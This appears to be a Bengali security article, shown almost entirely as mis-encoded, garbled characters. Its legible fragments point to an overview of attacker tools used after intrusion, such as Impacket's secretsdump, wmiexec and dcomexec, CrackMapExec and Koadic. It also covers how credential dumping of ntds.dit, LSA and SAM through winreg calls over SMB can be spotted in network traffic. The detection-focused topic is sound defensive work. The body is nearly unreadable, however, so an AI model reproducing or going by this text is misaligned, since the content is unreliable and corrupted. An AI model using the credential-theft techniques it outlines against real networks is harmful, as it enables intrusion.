āĻāĻ°ā§āĻĒā§āĻ°ā§āĻ āĻ¸ā§āĻā§āĻāĻ°ā§ āĻšāĻžāĻŽāĻ˛āĻžāĻ° āĻ¸āĻāĻā§āĻ¯āĻž āĻĒā§āĻ°āĻ¤āĻŋ āĻŦāĻāĻ° āĻŦāĻžāĻĄāĻŧāĻā§: āĻāĻĻāĻžāĻšāĻ°āĻŖāĻ¸ā§āĻŦāĻ°ā§āĻĒ,
āĻāĻāĻŋ āĻ˛āĻā§āĻˇāĻŖā§āĻ¯āĻŧ āĻ¯ā§ āĻāĻ āĻ¸āĻ°āĻā§āĻāĻžāĻŽāĻā§āĻ˛āĻŋ āĻĒā§āĻ°āĻžāĻĨāĻŽāĻŋāĻ āĻ
āĻ¨ā§āĻĒā§āĻ°āĻŦā§āĻļā§āĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻšāĻ¯āĻŧ āĻ¨āĻž, āĻ¤āĻŦā§ āĻ
āĻŦāĻāĻžāĻ āĻžāĻŽā§āĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻŦāĻŋāĻāĻžāĻļā§āĻ° āĻāĻ¨ā§āĻ¯ āĻŦā§āĻ¯āĻŦāĻšā§āĻ¤ āĻšāĻ¯āĻŧāĨ¤ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ°āĻž āĻā§āĻ° āĻ
āĻ¨ā§āĻĒā§āĻ°āĻŦā§āĻļā§āĻ° āĻĒāĻ°ā§ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§ āĻāĻā§āĻ˛āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ āĻāĻāĻŋ, āĻāĻĒāĻžāĻ¯āĻŧ āĻĻā§āĻŦāĻžāĻ°āĻž, āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻž āĻāĻ āĻŋāĻ¨ āĻāĻŦāĻ āĻĒā§āĻ°āĻžāĻ¯āĻŧāĻļāĻ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋāĻ° āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ā§
āĻāĻŽāĻžāĻĻā§āĻ° āĻ¯āĻž āĻāĻ°āĻžāĻ° āĻĻāĻ°āĻāĻžāĻ° āĻāĻŋāĻ˛:
- āĻšā§āĻ¯āĻžāĻāĻŋāĻ āĻā§āĻ˛ āĻāĻŋāĻāĻžāĻŦā§ āĻāĻžāĻ āĻāĻ°ā§ āĻ¤āĻž āĻŦā§āĻā§āĻ¨. āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻā§ āĻāĻžāĻā§ āĻ˛āĻžāĻāĻžāĻ¤ā§ āĻšāĻŦā§ āĻāĻŦāĻ āĻ¤āĻžāĻ°āĻž āĻā§ āĻĒā§āĻ°āĻ¯ā§āĻā§āĻ¤āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§ āĻ¤āĻž āĻā§āĻāĻā§ āĻŦā§āĻ° āĻāĻ°ā§āĻ¨āĨ¤
- āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻĒā§āĻ°āĻĨāĻŽ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§ āĻ¤āĻĨā§āĻ¯ āĻ¸ā§āĻ°āĻā§āĻˇāĻž āĻ¸āĻ°āĻā§āĻāĻžāĻŽ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¯āĻž āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻž āĻ¯āĻžāĻ¯āĻŧ āĻ¨āĻž āĻ¤āĻž āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻāĻ°ā§āĻ¨. āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§ āĻāĻāĻāĻ¨ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§ āĻšāĻāĻ¯āĻŧāĻžāĻ° āĻāĻžāĻ°āĻŖā§, āĻ āĻĨāĻŦāĻž āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§ āĻ āĻŦāĻāĻžāĻ āĻžāĻŽā§āĻ° āĻāĻāĻāĻŋ āĻ¤ā§āĻ°ā§āĻāĻŋāĻā§ āĻāĻžāĻā§ āĻ˛āĻžāĻāĻžāĻā§āĻā§ āĻ¯āĻž āĻĒā§āĻ°ā§āĻŦā§ āĻāĻžāĻ¨āĻž āĻ¯āĻžāĻ¯āĻŧāĻ¨āĻŋāĨ¤ āĻ¤āĻžāĻ° āĻā§āĻ°āĻŋāĻ¯āĻŧāĻžāĻāĻ˛āĻžāĻĒā§āĻ° āĻĒā§āĻ°ā§ āĻā§āĻāĻ¨āĻāĻŋ āĻĒā§āĻ¨āĻ°ā§āĻĻā§āĻ§āĻžāĻ° āĻāĻ°āĻž āĻ¸āĻŽā§āĻāĻŦ āĻšāĻ¯āĻŧ, āĻ¤āĻžāĻ āĻāĻ°āĻ āĻāĻ¨ā§āĻĻā§āĻ˛āĻ¨ āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻžāĻ° āĻāĻā§āĻāĻž āĻāĻžāĻā§āĨ¤
- āĻ āĻ¨ā§āĻĒā§āĻ°āĻŦā§āĻļ āĻ¸āĻ¨āĻžāĻā§āĻ¤āĻāĻ°āĻŖ āĻ¸āĻ°āĻā§āĻāĻžāĻŽ āĻĨā§āĻā§ āĻŽāĻŋāĻĨā§āĻ¯āĻž āĻāĻ¤āĻŋāĻŦāĻžāĻāĻ āĻ¨āĻŋāĻ°ā§āĻŽā§āĻ˛. āĻāĻŽāĻžāĻĻā§āĻ° āĻā§āĻ˛ā§ āĻ¯āĻžāĻāĻ¯āĻŧāĻž āĻāĻāĻŋāĻ¤ āĻ¨āĻ¯āĻŧ āĻ¯ā§ āĻ¯āĻāĻ¨ āĻļā§āĻ§ā§āĻŽāĻžāĻ¤ā§āĻ° āĻŦā§āĻĻā§āĻ§āĻŋāĻŽāĻ¤ā§āĻ¤āĻžāĻ° āĻāĻŋāĻ¤ā§āĻ¤āĻŋāĻ¤ā§ āĻāĻŋāĻā§ āĻāĻžāĻ āĻāĻŦāĻŋāĻˇā§āĻā§āĻ¤ āĻšāĻ¯āĻŧ, āĻ¤āĻāĻ¨ āĻāĻ¨ āĻāĻ¨ āĻ¤ā§āĻ°ā§āĻāĻŋāĻā§āĻ˛āĻŋ āĻ¸āĻŽā§āĻāĻŦāĨ¤ āĻ¸āĻžāĻ§āĻžāĻ°āĻŖāĻ¤ āĻ āĻŦāĻāĻžāĻ āĻžāĻŽā§āĻ¤ā§ āĻĒāĻ°ā§āĻ¯āĻžāĻĒā§āĻ¤ āĻ¸āĻāĻā§āĻ¯āĻ āĻāĻĒāĻžāĻ¯āĻŧ āĻ°āĻ¯āĻŧā§āĻā§, āĻ¯ā§ āĻā§āĻ¨ā§ āĻ¤āĻĨā§āĻ¯ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĒā§āĻ°āĻĨāĻŽ āĻ¨āĻāĻ°ā§ āĻŦā§āĻ§ āĻĨā§āĻā§ āĻāĻ˛āĻžāĻĻāĻž āĻāĻ°āĻž āĻ¯āĻžāĻ¯āĻŧ āĻ¨āĻžāĨ¤
āĻāĻ āĻ¸āĻ°āĻā§āĻāĻžāĻŽāĻā§āĻ˛āĻŋ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻĻā§āĻ° āĻā§ āĻĻā§āĻ¯āĻŧ? āĻ¯āĻĻāĻŋ āĻāĻāĻŋ āĻāĻāĻāĻŋ āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻ āĻšāĻ¯āĻŧ, āĻ¤āĻŦā§ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§āĻ°āĻž āĻŽāĻĄāĻŋāĻāĻ˛āĻā§āĻ˛āĻŋāĻ° āĻāĻāĻāĻŋ āĻŦāĻĄāĻŧ āĻ˛āĻžāĻāĻŦā§āĻ°ā§āĻ°āĻŋ āĻĒāĻžāĻ¯āĻŧ āĻ¯āĻž āĻā§āĻ° āĻ āĻ¨ā§āĻĒā§āĻ°āĻŦā§āĻļā§āĻ° āĻĒāĻ°ā§ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻž āĻ¯ā§āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻ āĻ¨ā§āĻ āĻā§āĻ˛ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖāĻāĻžāĻŦā§ Impacket āĻŽāĻĄāĻŋāĻāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§, āĻ¯ā§āĻŽāĻ¨ MetasploitāĨ¤ āĻāĻāĻŋāĻ¤ā§ āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§āĻāĻžāĻŦā§ āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ dcomexec āĻāĻŦāĻ wmiexec āĻ°āĻ¯āĻŧā§āĻā§, āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻ āĻĨā§āĻā§ āĻŽā§āĻŽāĻ°āĻŋ āĻ ā§āĻ¯āĻžāĻāĻžāĻāĻ¨ā§āĻ āĻ¯ā§āĻ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻ¸āĻŋāĻā§āĻ°ā§āĻāĻ¸āĻĄāĻžāĻŽā§āĻĒ āĻ°āĻ¯āĻŧā§āĻā§āĨ¤ āĻĢāĻ˛āĻ¸ā§āĻŦāĻ°ā§āĻĒ, āĻāĻ āĻāĻžāĻ¤ā§āĻ¯āĻŧ āĻ˛āĻžāĻāĻŦā§āĻ°ā§āĻ°āĻŋāĻ° āĻāĻžāĻ°ā§āĻ¯āĻāĻ˛āĻžāĻĒā§āĻ° āĻ¸āĻ āĻŋāĻ āĻ¸āĻ¨āĻžāĻā§āĻ¤āĻāĻ°āĻŖ āĻĄā§āĻ°āĻŋāĻā§āĻāĻŋāĻāĻā§āĻ˛āĻŋāĻ° āĻ¸āĻ¨āĻžāĻā§āĻ¤āĻāĻ°āĻŖ āĻ¨āĻŋāĻļā§āĻāĻŋāĻ¤ āĻāĻ°āĻŦā§āĨ¤
CrackMapExec (āĻŦāĻž āĻ¸āĻšāĻāĻāĻžāĻŦā§ CME) āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§, āĻ¨āĻŋāĻ°ā§āĻŽāĻžāĻ¤āĻžāĻ°āĻž āĻāĻāĻāĻŋ āĻāĻžāĻ°āĻŖā§āĻ° āĻāĻ¨ā§āĻ¯ "āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ°āĻĄ āĻŦāĻžāĻ āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻ" āĻ˛āĻŋāĻā§āĻā§āĻ¨āĨ¤ āĻāĻāĻžāĻĄāĻŧāĻžāĻ, āĻāĻ¨āĻĒā§āĻ°āĻŋāĻ¯āĻŧ āĻĒāĻ°āĻŋāĻ¸ā§āĻĨāĻŋāĻ¤āĻŋāĻā§āĻ˛āĻŋāĻ° āĻāĻ¨ā§āĻ¯ CME-āĻāĻ° āĻ¤ā§āĻ°āĻŋ āĻāĻžāĻ°ā§āĻ¯āĻāĻžāĻ°āĻŋāĻ¤āĻž āĻ°āĻ¯āĻŧā§āĻā§: āĻāĻāĻŋ āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄ āĻŦāĻž āĻ¤āĻžāĻĻā§āĻ° āĻšā§āĻ¯āĻžāĻļāĻā§āĻ˛āĻŋ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻŽāĻŋāĻŽāĻŋāĻāĻžāĻāĻ, āĻāĻŦāĻ āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻ¸āĻŽā§āĻĒāĻžāĻĻāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯ āĻŽāĻŋāĻāĻžāĻ°āĻĒā§āĻ°ā§āĻāĻžāĻ° āĻŦāĻž āĻāĻŽā§āĻĒāĻžāĻ¯āĻŧāĻžāĻ° āĻāĻā§āĻ¨ā§āĻā§āĻ° āĻĒā§āĻ°āĻŦāĻ°ā§āĻ¤āĻ¨ āĻāĻŦāĻ āĻŦā§āĻ°ā§āĻĄā§ āĻŦā§āĻ˛āĻžāĻĄāĻšāĻžāĻāĻ¨ā§āĻĄāĨ¤
āĻāĻŽāĻžāĻĻā§āĻ° āĻĒāĻāĻ¨ā§āĻĻā§āĻ° āĻ¤ā§āĻ¤ā§āĻ¯āĻŧ āĻā§āĻ˛ āĻšāĻ˛ Koadic. āĻāĻāĻŋ āĻŦā§āĻļ āĻ¤āĻžāĻāĻž, āĻāĻāĻŋ 25 āĻ¸āĻžāĻ˛ā§ āĻāĻ¨ā§āĻ¤āĻ°ā§āĻāĻžāĻ¤āĻŋāĻ āĻšā§āĻ¯āĻžāĻāĻžāĻ° āĻāĻ¨āĻĢāĻžāĻ°ā§āĻ¨ā§āĻ¸ DEFCON 2017-āĻ āĻāĻĒāĻ¸ā§āĻĨāĻžāĻĒāĻŋāĻ¤ āĻšāĻ¯āĻŧā§āĻāĻŋāĻ˛ āĻāĻŦāĻ āĻāĻāĻāĻŋ āĻ -āĻŽāĻžāĻ¨āĻ āĻĒāĻĻā§āĻ§āĻ¤āĻŋ āĻ°āĻ¯āĻŧā§āĻā§: āĻāĻāĻŋ HTTP, Java āĻ¸ā§āĻā§āĻ°āĻŋāĻĒā§āĻ āĻāĻŦāĻ Microsoft Visual Basic Script (VBS) āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻžāĻ āĻāĻ°ā§āĨ¤ āĻāĻ āĻĒāĻĻā§āĻ§āĻ¤āĻŋāĻāĻŋāĻā§ āĻŦāĻ˛āĻž āĻšāĻ¯āĻŧ āĻ˛āĻŋāĻāĻŋāĻ āĻ āĻĢ āĻ˛ā§āĻ¯āĻžāĻ¨ā§āĻĄ: āĻā§āĻ˛āĻāĻŋ āĻāĻāĻ¨ā§āĻĄā§āĻā§ āĻ¤ā§āĻ°āĻŋ āĻ¨āĻŋāĻ°ā§āĻāĻ°āĻ¤āĻž āĻāĻŦāĻ āĻ˛āĻžāĻāĻŦā§āĻ°ā§āĻ°āĻŋāĻ° āĻāĻāĻāĻŋ āĻ¸ā§āĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĨ¤ āĻ¨āĻŋāĻ°ā§āĻŽāĻžāĻ¤āĻžāĻ°āĻž āĻāĻāĻŋāĻā§ COM āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻ ā§āĻ¯āĻžāĻ¨ā§āĻĄ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛ āĻŦāĻž C3 āĻŦāĻ˛ā§āĨ¤
IMPACKET
āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻā§āĻ° āĻāĻžāĻ°ā§āĻ¯āĻāĻžāĻ°āĻŋāĻ¤āĻž āĻ āĻ¤ā§āĻ¯āĻ¨ā§āĻ¤ āĻŦāĻŋāĻ¸ā§āĻ¤ā§āĻ¤, AD āĻāĻ° āĻŽāĻ§ā§āĻ¯ā§ āĻĒā§āĻ¨āĻāĻ¸ā§āĻāĻ¨āĻž āĻāĻ°āĻž āĻĨā§āĻā§ āĻļā§āĻ°ā§ āĻāĻ°ā§ āĻ āĻā§āĻ¯āĻ¨ā§āĻ¤āĻ°ā§āĻŖ MS SQL āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĨā§āĻā§ āĻĄā§āĻāĻž āĻ¸āĻāĻā§āĻ°āĻš āĻāĻ°āĻž, āĻļāĻāĻ¸āĻžāĻĒāĻ¤ā§āĻ°āĻā§āĻ˛āĻŋ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻā§āĻļāĻ˛āĻā§āĻ˛āĻŋāĻ° āĻ¸āĻžāĻĨā§ āĻļā§āĻˇ āĻšāĻ¯āĻŧ: āĻāĻāĻŋ āĻāĻāĻāĻŋ SMB āĻ°āĻŋāĻ˛ā§ āĻāĻā§āĻ°āĻŽāĻŖ, āĻāĻŦāĻ āĻāĻāĻāĻŋ āĻĄā§āĻŽā§āĻ¨ āĻĨā§āĻā§ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄ āĻšā§āĻ¯āĻžāĻļ āĻ§āĻžāĻ°āĻŖāĻāĻžāĻ°ā§ ntds.dit āĻĢāĻžāĻāĻ˛ āĻĒā§āĻ°āĻžāĻĒā§āĻ¤ āĻāĻ°āĻžāĨ¤ āĻ¨āĻŋāĻ¯āĻŧāĻžāĻŽāĻ āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻ āĻāĻžāĻ°āĻāĻŋ āĻāĻŋāĻ¨ā§āĻ¨ āĻĒāĻĻā§āĻ§āĻ¤āĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§āĻāĻžāĻŦā§ āĻāĻŽāĻžāĻ¨ā§āĻĄāĻā§āĻ˛āĻŋ āĻāĻžāĻ˛āĻžāĻ¯āĻŧ: WMI āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§, āĻāĻāĻ¨ā§āĻĄā§āĻ āĻļāĻŋāĻĄāĻŋāĻāĻ˛āĻžāĻ°, DCOM āĻāĻŦāĻ SMB āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻ¨āĻž āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻāĻŋ āĻĒāĻ°āĻŋāĻˇā§āĻŦāĻž āĻāĻŦāĻ āĻāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻŋāĻ° āĻĒā§āĻ°āĻŽāĻžāĻŖāĻĒāĻ¤ā§āĻ°ā§āĻ° āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨āĨ¤
āĻā§āĻĒāĻ¨ āĻĄāĻžāĻŽā§āĻĒ
āĻāĻ˛ā§āĻ¨ secretsdump āĻāĻāĻžāĻā§āĻˇāĻĒāĻžāĻ¤ āĻāĻ°āĻž āĻ¯āĻžāĻ. āĻāĻāĻŋ āĻāĻāĻāĻŋ āĻŽāĻĄāĻŋāĻāĻ˛ āĻ¯āĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻŽā§āĻļāĻŋāĻ¨ āĻāĻŦāĻ āĻĄā§āĻŽā§āĻ¨ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛āĻžāĻ° āĻāĻāĻ¯āĻŧāĻā§āĻ āĻ˛āĻā§āĻˇā§āĻ¯ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻāĻāĻŋāĻ° āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ā§, āĻāĻĒāĻ¨āĻŋ LSA, SAM, SECURITY, NTDS.dit āĻŽā§āĻŽāĻ°āĻŋ āĻāĻ˛āĻžāĻāĻžāĻ° āĻāĻĒāĻŋ āĻĒā§āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨, āĻ¤āĻžāĻ āĻāĻāĻŋ āĻāĻā§āĻ°āĻŽāĻŖā§āĻ° āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻĒāĻ°ā§āĻ¯āĻžāĻ¯āĻŧā§ āĻĻā§āĻāĻž āĻ¯āĻžāĻ¯āĻŧāĨ¤ āĻŽāĻĄāĻŋāĻāĻ˛ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻ¨āĻžāĻ° āĻĒā§āĻ°āĻĨāĻŽ āĻ§āĻžāĻĒ āĻšāĻ˛ SMB āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻĒā§āĻ°āĻŽāĻžāĻŖā§āĻāĻ°āĻŖ, āĻ¯āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻšāĻ¯āĻŧ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ°āĻāĻžāĻ°ā§āĻ° āĻĒāĻžāĻ¸āĻāĻ¯āĻŧāĻžāĻ°ā§āĻĄ āĻŦāĻž āĻšā§āĻ¯āĻžāĻļā§āĻ° āĻĒā§āĻ°āĻ¯āĻŧā§āĻāĻ¨ āĻšāĻ¯āĻŧ āĻ¸ā§āĻŦāĻ¯āĻŧāĻāĻā§āĻ°āĻŋāĻ¯āĻŧāĻāĻžāĻŦā§ āĻĒāĻžāĻ¸ āĻĻā§āĻ¯ āĻšā§āĻ¯āĻžāĻļ āĻāĻā§āĻ°āĻŽāĻŖ āĻāĻžāĻ˛āĻžāĻ¨ā§āĻ° āĻāĻ¨ā§āĻ¯āĨ¤ āĻāĻ°āĻĒāĻ°ā§ āĻāĻāĻāĻŋ āĻ āĻ¨ā§āĻ°ā§āĻ§ āĻāĻ¸ā§ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻāĻ¨ā§āĻā§āĻ°ā§āĻ˛ āĻŽā§āĻ¯āĻžāĻ¨ā§āĻāĻžāĻ° (āĻāĻ¸āĻ¸āĻŋāĻāĻŽ) āĻāĻ° āĻāĻžāĻā§ āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻā§āĻ˛āĻžāĻ° āĻāĻŦāĻ āĻāĻāĻ¨āĻ°ā§āĻ āĻĒā§āĻ°ā§āĻā§āĻāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻ°ā§āĻāĻŋāĻ¸ā§āĻā§āĻ°āĻŋāĻ¤ā§ āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻāĻ¨ā§āĻ¯, āĻ¯āĻž āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻā§āĻ°āĻŽāĻŖāĻāĻžāĻ°ā§ āĻ¤āĻžāĻ° āĻāĻā§āĻ°āĻšā§āĻ° āĻļāĻžāĻāĻžāĻā§āĻ˛āĻŋāĻ° āĻĄā§āĻāĻž āĻā§āĻāĻā§ āĻĒā§āĻ¤ā§ āĻāĻŦāĻ SMB āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻĢāĻ˛āĻžāĻĢāĻ˛ āĻĒā§āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤
āĻĄā§āĻŽā§āĻ° āĻāĻĒāĻ°. 1 āĻāĻŽāĻ°āĻž āĻĻā§āĻāĻ¤ā§ āĻĒāĻžāĻ āĻāĻŋāĻāĻžāĻŦā§, āĻāĻāĻ¨āĻ°ā§āĻ āĻĒā§āĻ°ā§āĻā§āĻāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻžāĻ° āĻ¸āĻŽāĻ¯āĻŧ, LSA-āĻāĻ° āĻ¸āĻžāĻĨā§ āĻ°ā§āĻāĻŋāĻ¸ā§āĻā§āĻ°āĻŋ āĻā§ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻ¯āĻžāĻ¯āĻŧāĨ¤ āĻāĻāĻŋ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯, opcode 15 - OpenKey āĻ¸āĻš DCERPC āĻāĻŽāĻžāĻ¨ā§āĻĄāĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§āĻ¨āĨ¤
āĻāĻžāĻ¤āĨ¤ 1. winreg āĻĒā§āĻ°ā§āĻā§āĻāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻāĻāĻāĻŋ āĻ°ā§āĻāĻŋāĻ¸ā§āĻā§āĻ°āĻŋ āĻā§ āĻā§āĻ˛āĻž
āĻāĻ°āĻ, āĻ¯āĻāĻ¨ āĻā§ āĻĻā§āĻŦāĻžāĻ°āĻž āĻ ā§āĻ¯āĻžāĻā§āĻ¸ā§āĻ¸ āĻĒāĻžāĻāĻ¯āĻŧāĻž āĻ¯āĻžāĻ¯āĻŧ, āĻ¤āĻāĻ¨ āĻŽāĻžāĻ¨āĻā§āĻ˛āĻŋ SaveKey āĻāĻŽāĻžāĻ¨ā§āĻĄā§āĻ° āĻĻā§āĻŦāĻžāĻ°āĻž āĻ āĻĒāĻā§āĻĄ 20 āĻĻā§āĻŦāĻžāĻ°āĻž āĻ¸āĻāĻ°āĻā§āĻˇāĻŋāĻ¤ āĻšāĻ¯āĻŧāĨ¤ āĻāĻŽāĻĒā§āĻ¯āĻžāĻā§āĻ āĻāĻāĻŋ āĻāĻāĻāĻŋ āĻā§āĻŦ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻĒāĻžāĻ¯āĻŧā§ āĻāĻ°ā§āĨ¤ āĻāĻāĻŋ āĻāĻāĻāĻŋ āĻĢāĻžāĻāĻ˛ā§ āĻŽāĻžāĻ¨ āĻ¸āĻāĻ°āĻā§āĻˇāĻŖ āĻāĻ°ā§ āĻ¯āĻžāĻ° āĻ¨āĻžāĻŽ .tmp āĻ¯ā§āĻā§āĻ¤ 8 āĻ°ā§āĻ¯āĻžāĻ¨ā§āĻĄāĻŽ āĻ āĻā§āĻˇāĻ°ā§āĻ° āĻāĻāĻāĻŋ āĻ¸ā§āĻā§āĻ°āĻŋāĻāĨ¤ āĻāĻĒāĻ°āĻ¨ā§āĻ¤ā§, āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽ32 āĻĄāĻŋāĻ°ā§āĻā§āĻāĻ°āĻŋ āĻĨā§āĻā§ SMB-āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻāĻ āĻĢāĻžāĻāĻ˛āĻāĻŋāĻ° āĻāĻ°āĻ āĻāĻ¨āĻ˛ā§āĻĄ āĻāĻ°āĻž āĻšāĻ¯āĻŧ (āĻāĻŋāĻ¤ā§āĻ° 2)āĨ¤
āĻāĻžāĻ¤āĨ¤ 2. āĻĻā§āĻ°āĻŦāĻ°ā§āĻ¤ā§ āĻŽā§āĻļāĻŋāĻ¨ āĻĨā§āĻā§ āĻāĻāĻāĻŋ āĻ°ā§āĻāĻŋāĻ¸ā§āĻā§āĻ°āĻŋ āĻā§ āĻĒāĻžāĻāĻ¯āĻŧāĻžāĻ° āĻ¸ā§āĻāĻŋāĻŽ
āĻĻā§āĻāĻž āĻ¯āĻžāĻā§āĻā§ āĻ¯ā§ āĻāĻĒāĻ¨āĻŋ āĻāĻāĻ¨āĻ°ā§āĻ āĻĒā§āĻ°ā§āĻā§āĻāĻ˛, āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻ¨āĻžāĻŽ, āĻāĻŽāĻžāĻ¨ā§āĻĄ āĻāĻŦāĻ āĻ¤āĻžāĻĻā§āĻ° āĻ āĻ°ā§āĻĄāĻžāĻ° āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§ āĻ°ā§āĻāĻŋāĻ¸ā§āĻā§āĻ°āĻŋāĻ° āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻļāĻžāĻāĻžāĻā§āĻ˛āĻŋ āĻ āĻ¨ā§āĻ¸āĻ¨ā§āĻ§āĻžāĻ¨ āĻāĻ°ā§ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§ āĻāĻ āĻāĻžāĻ¤ā§āĻ¯āĻŧ āĻāĻžāĻ°ā§āĻ¯āĻāĻ˛āĻžāĻĒ āĻ¸āĻ¨āĻžāĻā§āĻ¤ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨āĨ¤
